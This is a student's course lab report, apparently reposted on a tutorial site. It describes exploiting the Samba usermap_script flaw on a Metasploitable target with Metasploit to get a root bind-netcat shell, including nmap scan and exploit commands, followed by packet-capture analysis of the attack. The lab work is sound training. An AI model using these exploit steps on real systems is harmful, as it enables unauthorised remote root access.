学号20212803 2021-2022-2 《网络攻防实践》实践七报告

2022/4/28 23:43:21

本文主要是介绍学号20212803 2021-2022-2 《网络攻防实践》实践七报告,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!

学号20212803 2021-2022-2 《网络攻防实践》实践七报告

1.实践内容

本周学习了使用metasploit工具进行攻击和使用监听工具分析攻击数据包的技能。
使用Metasploit进行Linux远程渗透攻击。
使用Metasploit渗透测试软件,攻击Linux靶机上的Samba服务Usermap_script安全漏洞,获取目标Linux靶机的主机访问权限。
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。
实践步骤

1.启动Metasploit软件,可根据个人喜好使用msfconsole、msfgui、msfweb之一;
2.使用exploit:exploit/multi/samba/usermap_script渗透攻击模块;
3.选择攻击PAYLOAD为远程shell,(正向或反向连接均可);
4.设置渗透攻击参数(RHOST,LHOST,TARGET等);
5.执行渗透攻击;
6.查看是否正确得到远程Shell,并查看获得的权限。

攻防对抗实践

攻击方:使用 Metasploit ,选择 Metasploitable 靶机中发现的漏洞进行渗透攻击,获得远程控制权,并尝试进一步获得root权限。
防守方:使用 tcpdump/wireshark/snort 监听获得网络攻击的数据包文件,结合 wireshark/snort 分析攻击过程,获得攻击者的IP、目标IP和端口、攻击发起时间、攻击利用漏洞、使用Shellcode、以及成功之后在命令行输入的信息。

2.实践过程

linux渗透实验
本次实验使用的攻击机为Kali,IP地址为192.168.128.137;靶机为Metasploit Ubuntu,IP地址为192.168.128.6
在kali打开metasploit,并使用search samba搜索关键词找到合适的渗透模块。
exploit/multi/samba/usermap_script模块为我们所需要的。

输入命令 use exploit/multi/samba/usermap_script加载渗透模块

使用show payloads显示攻击载荷

使用set payload cmd/unix/bind_netcat设置攻击载荷

设置攻击机IP和靶机IP 命令 set RHOST 192.168.128.6;set LHOST 192.168.128.137,

然后run进行攻击,攻击成功后输入ifconfig命令查看IP地址,输入whoami查看当前权限账户为root

攻防对抗实验
攻击方为kali IP 172.30.2.56 ;防守方为Metasploit Ubuntu IP 172.30.7.239
使用命令 nmap -sV 172.30.7.239 扫描目标主机的开放端口和版本号等信息

使用命令 nmap --script vuln 172.30.7.239 扫描目标主机的漏洞

随后步骤与上文相似
随后捕获了如下数据包。

如下图可以判断攻击IP为 172.30.2.56 端口为139

如下图可只攻击时间大概为2022,5,28 22:37

追踪tcp流可以分析出使用下列漏洞。使用的漏洞为Samba服务 usermap_script安全漏洞

攻击成功后输入了如下命令

echo
ifconfig
等

3.学习中遇到的问题及解决

问题1:对攻击的分析方式不明白
问题2:对shellcode不知道如何分析
对于如上问题,查阅了其他博客才有所理解

4.实践总结

本次实验我实验了metasploit工具,使用Metasploit进行Linux远程渗透攻击,并进一步熟悉了Metasploit工具的使用。通过攻防对抗实验,动手实验了攻击的包的捕获过程,并通过查阅资料和自己的探索,学会了对攻击的包的分析,掌握了漏洞搜集的基本能力。提高了自己的实践能力。



这篇关于学号20212803 2021-2022-2 《网络攻防实践》实践七报告的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!


扫一扫关注最新编程教程